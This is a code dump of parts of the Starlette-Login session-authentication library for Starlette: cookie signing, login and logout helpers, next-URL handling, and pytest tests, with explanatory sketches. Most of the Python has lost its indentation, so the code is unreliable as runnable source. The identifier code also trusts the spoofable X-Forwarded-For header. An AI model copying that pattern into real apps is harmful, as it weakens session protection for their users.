from starlette.requests import Request
from .mixins import UserMixin, AnonymousUser
LOGIN_MANAGER_ERROR = 'LoginManager is not set'
async def login_user(
request: Request, user: UserMixin, remember: bool = False,
duration: timedelta = None, fresh: bool = True
) -> bool:
assert request.scope.get('app') is not None, \
'Invalid Starlette app'
    login_manager = getattr(request.app.state, 'login_manager', None)
    assert login_manager is not None, LOGIN_MANAGER_ERROR
assert user.identity is not None, \
'user identity implementation is required'
request.session[
login_manager.config.SESSION_NAME_KEY
] = user.identity
request.session[
login_manager.config.SESSION_NAME_FRESH
] = fresh
request.session[
login_manager.config.SESSION_NAME_ID
] = create_identifier(request)
if remember:
request.session[
login_manager.config.REMEMBER_COOKIE_NAME
] = 'set'
if duration is not None:
request.session[
login_manager.config.REMEMBER_SECONDS_NAME
] = duration.total_seconds()
request.scope['user'] = user
return True
async def logout_user(request: Request) -> None:
assert request.scope.get('app') is not None, \
'Invalid Starlette app'
login_manager = getattr(request.app.state, 'login_manager', None)
assert login_manager is not None, LOGIN_MANAGER_ERROR
session_key = login_manager.config.SESSION_NAME_KEY
session_fresh = login_manager.config.SESSION_NAME_FRESH
session_id = login_manager.config.SESSION_NAME_ID
remember_cookie = login_manager.config.REMEMBER_COOKIE_NAME
if session_key in request.session:
request.session.pop(session_key)
if session_fresh in request.session:
request.session.pop(session_fresh)
if session_id in request.session:
request.session.pop(session_id)
if remember_cookie in request.cookies:
request.session[remember_cookie] = 'clear'
remember_seconds = login_manager.config.REMEMBER_SECONDS_NAME
if remember_seconds in request.session:
request.session.pop(remember_seconds)
request.scope['user'] = AnonymousUser()
def encode_cookie(payload: str, key: str) -> str:
return f'{payload}|{_cookie_digest(payload, key=key)}'
def decode_cookie(cookie: str, key: str) -> typing.Optional[str]:
try:
payload, digest = cookie.rsplit('|', 1)
if hasattr(digest, 'decode'):
digest = digest.decode('ascii')
except ValueError:
return
if hmac.compare_digest(_cookie_digest(payload, key=key), digest):
return payload
def make_next_url(
redirect_url: str, next_url: str = None
) -> typing.Optional[str]:
if next_url is None:
return redirect_url
r_url = urlparse(redirect_url)
n_url = urlparse(next_url)
if (not r_url.scheme or r_url.scheme == n_url.scheme) and \
            (not n_url.netloc or r_url.netloc == n_url.netloc):
param_next = urlunparse((
'', '', n_url.path, n_url.params, n_url.query, ''
))
else:
param_next = next_url
if param_next:
param_next = '='.join(('next', quote(param_next)))
if r_url.query:
result_url = r_url._replace(query='&'.join((r_url.query, param_next)))
else:
result_url = r_url._replace(query=param_next)
return urlunparse(result_url)
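# For example (illustrative): make_next_url('/login', '/profile') returns
# '/login?next=/profile', while make_next_url('/login') returns '/login' unchanged.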
def _get_remote_address(request: Request) -> typing.Optional[str]:
address = request.headers.get('X-Forwarded-For')
if address is not None:
address = address.split(',')[0].strip()
else:
client = request.scope.get('client')
if client is not None:
address = client[0]
else:
address = None
return address
def create_identifier(request) -> str:
user_agent = request.headers.get('User-Agent')
if user_agent is not None:
user_agent = user_agent.encode('utf-8')
base = f'{_get_remote_address(request)}|{user_agent}'
h = sha512()
h.update(base.encode('utf8'))
return h.hexdigest()
def _secret_key(secret_key: typing.Union[bytes, str]) -> bytes:
"""ensure bytes"""
if isinstance(secret_key, str):
return secret_key.encode('latin1')
return secret_key
def _cookie_digest(payload: str, key: str) -> str:
key = _secret_key(key)
if not isinstance(payload, str):
payload = str(payload)
return hmac.new(key, payload.encode('utf-8'), sha512).hexdigest()
```
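The helpers in `utils.py` are small enough to exercise in isolation. The following is a minimal sketch that uses only the functions defined above; the secret key and URLs are illustrative values, not anything the library prescribes.
```python
# Round-trip sketch for the cookie and next-URL helpers above.
# SECRET and the URLs are made-up example values.
from starlette_login.utils import decode_cookie, encode_cookie, make_next_url

SECRET = 'example-secret-key'

# encode_cookie appends an HMAC-SHA512 digest of the payload;
# decode_cookie verifies the digest and returns the payload, or None
# when the cookie has been tampered with.
cookie = encode_cookie('42', key=SECRET)
assert decode_cookie(cookie, key=SECRET) == '42'
assert decode_cookie(cookie + 'tampered', key=SECRET) is None

# make_next_url folds the originally requested path into the login
# redirect as a `next` query parameter.
assert make_next_url('/login', '/protected') == '/login?next=/protected'
```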
#### File: Starlette-Login/tests/decorators.py
```python
import asyncio
import functools
import inspect
import typing
from starlette.exceptions import HTTPException
from starlette.requests import Request
from starlette.responses import Response
# is_route_function validates that `func` is a route handler taking a Request
# and returns the positional index of that argument (used to pull it from *args)
from starlette_login.decorator import is_route_function
from .model import User
def admin_only(func: typing.Callable) -> typing.Callable:
idx = is_route_function(func)
if asyncio.iscoroutinefunction(func):
@functools.wraps(func)
async def async_wrapper(
*args: typing.Any, **kwargs: typing.Any
) -> Response:
request = kwargs.get("request", args[idx] if args else None)
assert isinstance(request, Request)
user = request.scope.get('user')
if user and user.is_admin is not True:
raise HTTPException(status_code=403, detail='Forbidden access')
else:
return await func(*args, **kwargs)
return async_wrapper
else:
@functools.wraps(func)
def sync_wrapper(*args: typing.Any, **kwargs: typing.Any) -> Response:
request = kwargs.get("request", args[idx] if args else None)
assert isinstance(request, Request)
user = request.scope.get('user')
if user and user.is_admin is not True:
raise HTTPException(status_code=403, detail='Forbidden access')
else:
return func(*args, **kwargs)
return sync_wrapper
```
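In `tests/views.py` further down, `admin_only` is stacked beneath `login_required`. The sketch below is a hedged illustration of that intended ordering; the route name and response text are made up. Decorators apply bottom-up, so `admin_only` wraps the view first and `login_required` wraps the result, meaning the authentication check runs before the admin check at request time.
```python
# Hedged sketch of composing admin_only with Starlette-Login's
# login_required; the handler below is illustrative, not from the repo.
from starlette.requests import Request
from starlette.responses import PlainTextResponse
from starlette_login.decorator import login_required

from .decorators import admin_only


@login_required   # evaluated first per request: rejects anonymous users
@admin_only       # evaluated second: raises HTTPException(403) for non-admins
async def admin_dashboard(request: Request):
    return PlainTextResponse('admin dashboard')
```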
#### File: Starlette-Login/tests/test_decorator.py
```python
import pytest
@pytest.mark.asyncio
class TestLoginRequiredDecorator:
async def test_not_logged_in(self, test_client):
resp = test_client.get('/protected')
assert resp.status_code != 302
assert resp.headers.get('location') != '/'
async def test_logged_in(self, app, test_client):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get('/protected')
assert resp.status_code == 200
async def test_sync_page_not_logged_in(self, test_client):
resp = test_client.get('/sync_protected')
assert resp.status_code != 302
assert resp.headers.get('location') != '/'
async def test_sync_page_logged_in(self, app, test_client):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get('/sync_protected')
assert resp.status_code == 200
@pytest.mark.asyncio
class TestFreshLoginRequiredDecorator:
@pytest.mark.parametrize('path', ['/fresh', '/fresh_async'])
async def test_fresh_login(self, test_client, path):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get(path)
assert resp.status_code == 200
@pytest.mark.parametrize('path', ['/fresh', '/fresh_async'])
async def test_fresh_login_after_clean_session(
self, test_client, path
):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
resp = test_client.get(path)
assert resp.status_code == 200
# Set fresh session False
test_client.get('/un_fresh')
resp = test_client.get(path)
assert f'/login?next={path}' in resp.url
@pytest.mark.asyncio
class TestAdminOnlyDecorator:
async def test_regular_user(
self, test_client,
):
test_client.post('/login', data={
'username': 'user1', 'password': 'password'
})
path = '/admin_only'
resp = test_client.get(path)
assert resp.status_code == 403
async def test_regular_admin(
self, test_client,
):
test_client.post('/login', data={
'username': 'admin', 'password': 'password'
})
path = '/admin_only'
resp = test_client.get(path)
assert resp.status_code == 200
```
#### File: Starlette-Login/tests/test_mixins.py
```python
from starlette_login.mixins import UserMixin, AnonymousUser
class TestUserMixinTest:
def test_anonymous_user(self):
anon = AnonymousUser()
assert anon.is_authenticated is False
assert anon.display_name == ''
assert anon.identity is None
def test_user(self):
user = UserMixin()
assert user.is_authenticated is True
```
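The test modules in this excerpt import `User` and `user_list` from a `tests/model.py` that is not shown here. The sketch below is a hypothetical reconstruction inferred from how those names are used (`identity`, `username`, `is_admin`, `check_password`, `get_by_username`); the repository's actual model may differ.
```python
# Hypothetical tests/model.py sketch, inferred from usage elsewhere in this
# excerpt. Not the repository's actual implementation.
import typing

from starlette_login.mixins import UserMixin


class User(UserMixin):
    def __init__(self, identifier: int, username: str, password: str,
                 is_admin: bool = False):
        self._identity = identifier
        self.username = username
        self.password = password
        self.is_admin = is_admin

    @property
    def identity(self) -> int:
        return self._identity

    @property
    def display_name(self) -> str:
        return self.username

    def check_password(self, password: str) -> bool:
        # Plain-text comparison is enough for a test fixture sketch.
        return self.password == password


class UserList:
    def __init__(self, users: typing.List[User]):
        self.users = users

    def get_by_username(self, username: str) -> typing.Optional[User]:
        return next((u for u in self.users if u.username == username), None)

    def get_by_id(self, identifier: int) -> typing.Optional[User]:
        return next((u for u in self.users if u.identity == identifier), None)


user_list = UserList([
    User(1, 'user1', 'password'),
    User(2, 'admin', 'password', is_admin=True),
])
```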
#### File: Starlette-Login/tests/views.py
```python
from urllib.parse import parse_qsl
from starlette.requests import Request
from starlette.responses import (
HTMLResponse, RedirectResponse, PlainTextResponse, JSONResponse
)
from starlette_login.decorator import login_required, fresh_login_required
from starlette_login.utils import login_user, logout_user
from .decorators import admin_only
from .extension import login_manager
from .model import user_list
HOME_PAGE = "You are logged in as {{ user.username }}"
LOGIN_PAGE = """
<h4>{error}<h4>
<form method="POST">
<label>username <input name="username"></label>
<label>Password <input name="password" type="password"></label>
<button type="submit">Login</button>
</form>
"""
async def login_page(request: Request):
error = ''
if request.method == 'POST':
body = (await request.body()).decode()
data = dict(parse_qsl(body))
user = user_list.get_by_username(data['username'])
if not user:
error = 'Invalid username'
elif user.check_password(data['password']) is False:
error = 'Invalid password'
else:
await login_user(request, user, bool(data.get('remember')))
return RedirectResponse('/', 302)
return HTMLResponse(LOGIN_PAGE.format(error=error))
async def logout_page(request: Request):
if request.user.is_authenticated:
content = 'Logged out'
await logout_user(request)
else:
        content = 'You are not logged in'
return PlainTextResponse(content)
async def home_page(request: Request):
if request.user.is_authenticated:
content = f'You are logged in as {request.user.username}'
else:
content = 'You are not logged in'
return PlainTextResponse(content=content)
@login_required
async def protected_page(request: Request):
if getattr(request, 'user') is not None:
username = request.user.username
else:
username = None
return PlainTextResponse(f'You are logged in as {username}')
@login_required
def sync_protected_page(request: Request):
return PlainTextResponse(
f'You are logged in as {request.user.username}'
)
@login_required
def get_request_data(request: Request):
return JSONResponse({
'user': request.user.__dict__,
'session': request.session,
'cookie': request.cookies
})
@fresh_login_required
def sync_fresh_login(request: Request):
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
@fresh_login_required
async def async_fresh_login(request: Request):
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
@login_required
@admin_only
async def admin_only_page(request: Request):
return PlainTextResponse('You are an admin')
def un_fresh_login(request: Request):
session_fresh = login_manager.config.SESSION_NAME_FRESH
request.session[session_fresh] = False
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
def clear_session(request: Request):
for key in login_manager.config.session_keys:
if key == login_manager.config.REMEMBER_COOKIE_NAME:
continue
try:
request.session.pop(key)
except KeyError:
pass
result = {'cookie': request.cookies, 'session': request.session}
return JSONResponse(result)
async def excluded(request: Request):
try:
user = request.user
except AssertionError:
        # request.user raises AssertionError when Starlette's
        # AuthenticationMiddleware has not processed this (excluded) route
user = None
return JSONResponse({
'user': getattr(user, 'username', None)
})
```
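The views above depend on application wiring that is not part of this excerpt (the route table and `tests/extension.py` are not shown). The sketch below is a hedged reconstruction of the minimal pieces they rely on: Starlette's `SessionMiddleware` so `request.session` exists, the `login_manager` attached to `app.state` (where `login_user`/`logout_user` look it up), and routes matching the paths the tests request. Starlette-Login also ships an authentication middleware that populates `request.user`; it is only referenced in a comment here because that module is not shown, and the `LoginManager` construction inside `extension.py` is likewise assumed.
```python
# Hypothetical wiring for the test views above. Route paths are taken from
# the tests in this excerpt; everything else is an assumption for
# illustration, not the repository's actual test app module.
from starlette.applications import Starlette
from starlette.middleware import Middleware
from starlette.middleware.sessions import SessionMiddleware
from starlette.routing import Route

from .extension import login_manager  # contents of extension.py not shown
from .views import (
    admin_only_page, home_page, login_page, logout_page, protected_page,
    sync_protected_page,
)

routes = [
    Route('/', home_page),
    Route('/login', login_page, methods=['GET', 'POST']),
    Route('/logout', logout_page),
    Route('/protected', protected_page),
    Route('/sync_protected', sync_protected_page),
    Route('/admin_only', admin_only_page),
    # /fresh, /fresh_async, /un_fresh, etc. would be registered the same way.
]

app = Starlette(
    routes=routes,
    middleware=[
        # request.session is required by login_user/logout_user above.
        Middleware(SessionMiddleware, secret_key='example-secret'),
        # The real test app also installs Starlette-Login's authentication
        # middleware so request.user is populated; omitted here because that
        # module is not part of this excerpt.
    ],
)

# login_user/logout_user resolve the manager via request.app.state.
app.state.login_manager = login_manager
```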